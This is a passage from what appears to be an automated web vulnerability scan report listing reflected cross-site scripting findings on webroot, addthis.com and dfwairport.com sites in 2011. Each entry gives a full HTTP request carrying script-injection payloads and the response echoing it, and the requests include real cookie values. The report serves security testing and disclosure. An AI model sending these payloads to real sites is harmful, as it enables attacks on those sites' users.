Cookie: op670worryfreegum=a00501e0042797q07l2qj8fbc; op670worryfreeliid=a00501e0042797q07l2qj8fbc; s_vnum=1318008426626%26vn%3D1; s_vi=[CS]v1|2733B1860501303E-60000113001F5CD6[CE]; v39=En_US%20%7C%20Business%20%7C%20Landing%20%7C%20Index; pageName=En_US%20%7C%20Business%20%7C%20Landing%20%7C%20Index; IS3_GSV=DPL-2_TES-1315417966_PCT-1315417966_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1314429892-2-89_4-2-+3--2__4-3_4-3; mbox=session#1315416421019-244022#1315419962|PC#1315416421019-244022.19#1331229302|check#true#1315418162; __utma=43535610.1371063031.1315416427.1315416427.1315416427.1; __utmb=43535610.6.10.1315416427; __utmc=43535610; __utmz=43535610.1315416427.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/; s_nr=1315418113012; s_lv=1315418113014; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:55:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20544


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Webroot Software</ti
...[SNIP]...
<form id="standardform" action="/autorenewal/auto_renewal_optout.php/41245"><script>alert(1)</script>426159b056e" method="post">
...[SNIP]...

1.129. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webroot.tt.omtrdc.net
Path:   /m2/webroot/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 121f5<script>alert(1)</script>5cffe219be1 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/webroot/mbox/standard?mboxHost=www.webroot.com&mboxSession=1315416421019-244022&mboxPage=1315416421019-244022&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=us-subfooter-cc121f5<script>alert(1)</script>5cffe219be1&mboxId=0&mboxTime=1315398421465&mboxURL=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fland-3up-wisc-wav-ss.html&mboxReferrer=http%3A%2F%2Fallthingsd.com%2F20110906%2Fbring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves%2F%23&mboxVersion=39 HTTP/1.1
Host: webroot.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/land-3up-wisc-wav-ss.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315416421019-244022.19; Domain=webroot.tt.omtrdc.net; Expires=Thu, 08-Mar-2012 12:28:11 GMT; Path=/m2/webroot
Content-Type: text/javascript
Content-Length: 211
Date: Wed, 07 Sep 2011 12:28:11 GMT
Server: Test & Target

mboxFactories.get('default').get('us-subfooter-cc121f5<script>alert(1)</script>5cffe219be1',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315416421019-244022.19");

1.130. http://www.addthis.com/api/nai/optout [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3196c<script>alert(1)</script>7f76aab143d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api3196c<script>alert(1)</script>7f76aab143d/nai/optout?nocache=0.8288083 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,95|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:46:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api3196c<script>alert(1)</script>7f76aab143d/nai/optout?nocache=0.8288083</strong>
...[SNIP]...

1.131. http://www.addthis.com/api/nai/optout [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92d7c"-alert(1)-"1cc2458db2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api92d7c"-alert(1)-"1cc2458db2f/nai/optout?nocache=0.8288083 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,95|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:46:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api92d7c"-alert(1)-"1cc2458db2f/nai/optout";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.132. http://www.addthis.com/api/nai/optout [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2dcf2<script>alert(1)</script>518a91a0a09 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai2dcf2<script>alert(1)</script>518a91a0a09/optout?nocache=0.8288083 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,95|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:46:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai2dcf2<script>alert(1)</script>518a91a0a09/optout?nocache=0.8288083</strong>
...[SNIP]...

1.133. http://www.addthis.com/api/nai/optout [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15b4a"-alert(1)-"3ff7ce65817 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai15b4a"-alert(1)-"3ff7ce65817/optout?nocache=0.8288083 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,95|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:46:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai15b4a"-alert(1)-"3ff7ce65817/optout";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.134. http://www.addthis.com/api/nai/optout [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 10e5b<script>alert(1)</script>6e3a323e6bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai/optout10e5b<script>alert(1)</script>6e3a323e6bf?nocache=0.8288083 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,95|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:46:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai/optout10e5b<script>alert(1)</script>6e3a323e6bf?nocache=0.8288083</strong>
...[SNIP]...

1.135. http://www.addthis.com/api/nai/optout [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1b47"-alert(1)-"d9497451a76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai/optouta1b47"-alert(1)-"d9497451a76?nocache=0.8288083 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,95|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:46:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai/optouta1b47"-alert(1)-"d9497451a76";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.136. http://www.addthis.com/api/nai/status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4389"-alert(1)-"e8fbdc2b414 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apie4389"-alert(1)-"e8fbdc2b414/nai/status?nocache=0.8315244 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,92|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:26:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/apie4389"-alert(1)-"e8fbdc2b414/nai/status";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.137. http://www.addthis.com/api/nai/status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba971<script>alert(1)</script>4b785aea6d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apiba971<script>alert(1)</script>4b785aea6d1/nai/status?nocache=0.8315244 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,92|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:26:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>apiba971<script>alert(1)</script>4b785aea6d1/nai/status?nocache=0.8315244</strong>
...[SNIP]...

1.138. http://www.addthis.com/api/nai/status [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fcedb<script>alert(1)</script>4c88d6f4c58 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/naifcedb<script>alert(1)</script>4c88d6f4c58/status?nocache=0.8315244 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,92|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:26:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/naifcedb<script>alert(1)</script>4c88d6f4c58/status?nocache=0.8315244</strong>
...[SNIP]...

1.139. http://www.addthis.com/api/nai/status [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d050e"-alert(1)-"337cc64e2aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/naid050e"-alert(1)-"337cc64e2aa/status?nocache=0.8315244 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,92|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:26:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/naid050e"-alert(1)-"337cc64e2aa/status";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.140. http://www.addthis.com/api/nai/status [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8937a"-alert(1)-"f049c6759df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai/status8937a"-alert(1)-"f049c6759df?nocache=0.8315244 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,92|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:26:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai/status8937a"-alert(1)-"f049c6759df";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.141. http://www.addthis.com/api/nai/status [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7397c<script>alert(1)</script>03437b72aad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai/status7397c<script>alert(1)</script>03437b72aad?nocache=0.8315244 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,92|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:26:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai/status7397c<script>alert(1)</script>03437b72aad?nocache=0.8315244</strong>
...[SNIP]...

1.142. http://www.dfwairport.com/globalentry/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dfwairport.com
Path:   /globalentry/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc0de"><script>alert(1)</script>6b250513e00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /globalentry/?fc0de"><script>alert(1)</script>6b250513e00=1 HTTP/1.1
Host: www.dfwairport.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.1
X-Cnection: close
Content-Type: text/html; charset=ISO-8859-1
Date: Wed, 07 Sep 2011 12:32:26 GMT
Content-Length: 27618
ETag: "pvd33189ac190a06bb27dc3346e56f1516"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, post-check=0, pre-check=0
Pragma: no-cache
X-PvInfo: [S10201.C29081.A24933.RA0.G0.UF68F28E3].[OT/html.OG/pages]
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv=
...[SNIP]...
<a href="mailto:&body=http://www.dfwairport.com/globalentry/?fc0de"><script>alert(1)</script>6b250513e00=1/" style="font-size:9px;">
...[SNIP]...

1.143. http://www.dfwairport.com/guide/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dfwairport.com
Path:   /guide/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a4f"><script>alert(1)</script>3f28e5e818a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

